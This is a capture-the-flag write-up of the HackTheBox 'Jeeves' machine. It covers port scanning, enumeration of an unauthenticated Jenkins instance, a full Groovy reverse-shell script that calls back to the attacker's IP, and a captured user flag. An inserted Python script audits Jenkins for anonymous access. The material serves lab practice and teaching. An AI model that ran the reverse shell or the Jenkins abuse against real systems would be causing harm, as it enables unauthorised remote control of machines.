Jeeves – HacktheBox
After getting the email that Jeeves will be retiring soon I thought I’d give it a go. This is the first Windows box that I’ve done in quite a while. Let's get into it.
START
A quick nmap scan to see what ports are open. The -F flag is Fast mode: scan fewer ports than the default scan.
[root:~/Desktop/jeeves]# nmap -F 10.10.10.63
Starting Nmap 7.70SVN ( https://nmap.org ) at 2018-05-17 10:09 BST
Nmap scan report for 10.10.10.63
Host is up, received echo-reply ttl 127 (0.029s latency).
Not shown: 97 filtered ports
Reason: 97 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE      REASON
80/tcp  open  http         syn-ack ttl 127
135/tcp open  msrpc        syn-ack ttl 127
445/tcp open  microsoft-ds syn-ack ttl 127
Nmap done: 1 IP address (1 host up) scanned in 2.16 seconds
Looks like a webserver is available and remote desktop. While I do a full port scan I’ll load up Firefox and take a look at the website.
When I use the search it brings me to a page with an error. It looks like it is displaying a picture rather than HTML or other code.
The full port scan completed:
Nmap scan report for 10.10.10.63
Host is up, received echo-reply ttl 127 (0.035s latency).
PORT      STATE SERVICE      REASON          VERSION
80/tcp    open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2018-05-09 02:02:11
|_  start_date: 2018-05-07 03:07:55
Port 50000 has a Jetty Server running. A quick Google reveals “Eclipse Jetty provides a Web server and javax.servlet container, plus support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. These components are open source and available for commercial use and distribution.” https://www.eclipse.org/jetty/
I checked what was on that webserver, then ran dirbuster against port 50000.
I browsed to the askjeeves directory and got what looks like a CMS called Jenkins.
A quick Google and it looks like Jenkins is a self-contained Java-based program, ready to run out-of-the-box, with packages for Windows, Mac OS X and other Unix-like operating systems.
I fired up Metasploit to see if it had a Jenkins module and sure enough it did have a few. I tried out one.
msf post(multi/gather/jenkins_gather) > use auxiliary/scanner/http/jenkins_enum
msf auxiliary(scanner/http/jenkins_enum) > show options

Module options (auxiliary/scanner/http/jenkins_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.63      yes       The target address range or CIDR identifier
   RPORT      50000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /askjeeves/      yes       The path to the Jenkins-CI application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(scanner/http/jenkins_enum) > run

[+] [2018.05.17-11:02:57] 10.10.10.63:50000 - Jenkins Version 2.87
[+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/script does not require authentication (200)
[+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/view/All/newJob does not require authentication (200)
[+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/asynchPeople/ does not require authentication (200)
[+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/systemInfo does not require authentication (200)
[*] [2018.05.17-11:02:57] Getting useful information from systemInfo
  OS: Windows 10
  OS Version: 10.0
  Arch: x86
  User: kohsuke
  Domain: JEEVES
  Home Directory: C:\Users\kohsuke
  Language: en
  Country: US
  Timezone: America/New_York
  Computer Name: JEEVES
  System Drive: C:
  Temp Directory: C:\Users\kohsuke\AppData\Local\Temp
  Temp Directory: C:\Users\kohsuke\AppData\Local\Temp
[*] [2018.05.17-11:02:58] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/jenkins_enum) >
So it is a Windows 10 box with a user kohsuke, and the Jenkins application is v2.87.
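The jenkins_enum output above boils down to one finding: the script console, systemInfo, job creation and user listing all answer 200 to an anonymous request. The check below is an added example (not part of the original post or of Metasploit) that verifies the same four paths are locked down after hardening; the fetch function is injectable so it runs offline against constructed responses, and the endpoint list is the one reported open above.

```python
"""Audit a Jenkins instance for endpoints that must never be reachable anonymously.
Added example, not code from the original post. Anonymous 200 on any listed path
means the authorization strategy still lets unauthenticated users in."""
import urllib.request
import urllib.error

# Paths reported as "does not require authentication" in the enumeration above,
# with why each one matters to a defender.
SENSITIVE_PATHS = {
    "script": "Groovy script console; must be limited to administrators",
    "systemInfo": "leaks service account, home directory, OS and temp paths",
    "view/All/newJob": "anonymous job creation; jobs run arbitrary build steps",
    "asynchPeople/": "user enumeration",
}


def http_status(url, timeout=5):
    """HTTP status of an unauthenticated GET. Redirects are not followed, so a
    hardened instance bouncing to /login shows up as 302, not as the login page's 200."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None

    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def audit_anonymous_access(base_url, fetch=http_status):
    """Return {path: reason} for each sensitive path that answers 200 anonymously.
    An empty dict is the expected result on a properly configured instance."""
    base = base_url.rstrip("/") + "/"
    return {p: why for p, why in SENSITIVE_PATHS.items() if fetch(base + p) == 200}


# Constructed responders: the first models the box in this post (everything open),
# the second a hardened instance that answers 403 to anonymous users.
def fake_fetch_open(url):
    return 200


def fake_fetch_hardened(url):
    return 403


if __name__ == "__main__":
    for path, why in audit_anonymous_access("http://10.10.10.63:50000/askjeeves/", fetch=fake_fetch_open).items():
        print(f"[!] /{path}: {why}")
```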
I browsed through the CMS and found a way to execute commands through a jar file I had to download.
Looks like it worked:
[root:~/Desktop/jeeves]# java -jar jenkins-cli.jar -s http://10.10.10.63:50000/askjeeves/ who-am-i
Authenticated as: anonymous
Authorities:
[root:~/Desktop/jeeves]#
Now what can I run? Nothing useful by the looks of it.
Available Commands
add-job-to-view | Adds jobs to view. |
build | Builds a job, and optionally waits until its completion. |
cancel-quiet-down | Cancel the effect of the “quiet-down” command. |
clear-queue | Clears the build queue. |
connect-node | Reconnect to a node(s) |
console | Retrieves console output of a build. |
copy-job | Copies a job. |
create-credentials-by-xml | Create Credential by XML |
create-credentials-domain-by-xml | Create Credentials Domain by XML |
create-job | Creates a new job by reading stdin as a configuration XML file. |
create-node | Creates a new node by reading stdin as a XML configuration. |
create-view | Creates a new view by reading stdin as a XML configuration. |
declarative-linter | Validate a Jenkinsfile containing a Declarative Pipeline |
delete-builds | Deletes build record(s). |
delete-credentials | Delete a Credential |
delete-credentials-domain | Delete a Credentials Domain |
delete-job | Deletes job(s). |
delete-node | Deletes node(s) |
delete-view | Deletes view(s). |
disable-job | Disables a job. |
disconnect-node | Disconnects from a node. |
enable-job | Enables a job. |
get-credentials-as-xml | Get a Credentials as XML (secrets redacted) |
get-credentials-domain-as-xml | Get a Credentials Domain as XML |
get-gradle | List available gradle installations |
get-job | Dumps the job definition XML to stdout. |
get-node | Dumps the node definition XML to stdout. |
get-view | Dumps the view definition XML to stdout. |
groovy | Executes the specified Groovy script. |
groovysh | Runs an interactive groovy shell. |
help | Lists all the available commands or a detailed description of single command. |
install-plugin | Installs a plugin either from a file, an URL, or from update center. |
install-tool | Performs automatic tool installation, and print its location to stdout. Can be only called from inside a build. [deprecated] |
keep-build | Mark the build to keep the build forever. |
list-changes | Dumps the changelog for the specified build(s). |
list-credentials | Lists the Credentials in a specific Store |
list-credentials-context-resolvers | List Credentials Context Resolvers |
list-credentials-providers | List Credentials Providers |
list-jobs | Lists all jobs in a specific view or item group. |
list-plugins | Outputs a list of installed plugins. |
login | Saves the current credentials to allow future commands to run without explicit credential information. [deprecated] |
logout | Deletes the credentials stored with the login command. [deprecated] |
Reads stdin and sends that out as an e-mail. | |
offline-node | Stop using a node for performing builds temporarily, until the next “online-node” command. |
online-node | Resume using a node for performing builds, to cancel out the earlier “offline-node” command. |
quiet-down | Quiet down Jenkins, in preparation for a restart. Don’t start any builds. |
reload-configuration | Discard all the loaded data in memory and reload everything from file system. Useful when you modified config files directly on disk. |
reload-job | Reload job(s) |
remove-job-from-view | Removes jobs from view. |
replay-pipeline | Replay a Pipeline build with edited script taken from standard input |
restart | Restart Jenkins. |
safe-restart | Safely restart Jenkins. |
safe-shutdown | Puts Jenkins into the quiet mode, wait for existing builds to be completed, and then shut down Jenkins. |
session-id | Outputs the session ID, which changes every time Jenkins restarts. |
set-build-description | Sets the description of a build. |
set-build-display-name | Sets the displayName of a build. |
set-build-parameter | Update/set the build parameter of the current build in progress. [deprecated] |
set-build-result | Sets the result of the current build. Works only if invoked from within a build. [deprecated] |
shutdown | Immediately shuts down Jenkins server. |
update-credentials-by-xml | Update Credentials by XML |
update-credentials-domain-by-xml | Update Credentials Domain by XML |
update-job | Updates the job definition XML from stdin. The opposite of the get-job command. |
update-node | Updates the node definition XML from stdin. The opposite of the get-node command. |
update-view | Updates the view definition XML from stdin. The opposite of the get-view command. |
version | Outputs the current version. |
wait-node-offline | Wait for a node to become offline. |
wait-node-online | Wait for a node to become online. |
who-am-i | Reports your credential and permissions. |
I need to upload a reverse shell and run it.
I found this page and a Groovy reverse shell script on https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76. I modified the IP and port and started a netcat listener.
String host="10.10.14.234";
int port=55555;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();
Bingo!
[root:~/Desktop/jeeves]# nc -nlvp 55555
listening on [any] 55555 ...
connect to [10.10.14.234] from (UNKNOWN) [10.10.10.63] 49680
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>
Time to capture the user flag.
C:\Users\kohsuke\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\kohsuke\Desktop

11/03/2017  11:19 PM    <DIR>          .
11/03/2017  11:19 PM    <DIR>          ..
11/03/2017  11:22 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,165,026,304 bytes free

C:\Users\kohsuke\Desktop>type user.txt
type user.txt
e3232272596fb47950d59c4cf1e7066a
Now for priv esc. Let's see what OS version is running and look for exploits.
C:\>systeminfo
systeminfo
Host Name: JEEVES
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.10586 N/A Build 10586
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-20304-47406-AA297
Original Install Date: 10/25/2017, 4:45:33 PM
System Boot Time: 5/16/2018, 2:50:22 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
“Researchers Discovered this Exploit in Microsoft Windows 10 Redstone 1 (August 2016) and specifically Target Microsoft Windows 10 x64 Version 1511 and The build number is Microsoft Windows 10.0.10586.” https://gbhackers.com/nsa-malware-eternalblue-successfully-exploit-and-port-into-microsoft-windows-10/
So I’ve learned that Windows 10 is also vulnerable to EternalBlue. I tried finding the Windows 10 exploit but couldn’t, and the Windows 7 one doesn’t work (I tried it).
After poking about the server I found a KeePass file.
C:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\kohsuke\Documents
11/03/2017 11:18 PM <DIR> .
11/03/2017 11:18 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
1 File(s) 2,846 bytes
2 Dir(s) 7,032,320,000 bytes free
I could not get it downloaded to my machine. If it were on a Linux box it would be a lot easier, but a netcat connection on a Windows box made it impossible (for me).
Summary
I didn’t learn much on this box other than how to search for files in DOS:
dir fileyouwant.whatever /s /p
Disappointed that I was unable to figure out how to transfer the file to my box. Please add a comment on how you would have done it.
FIN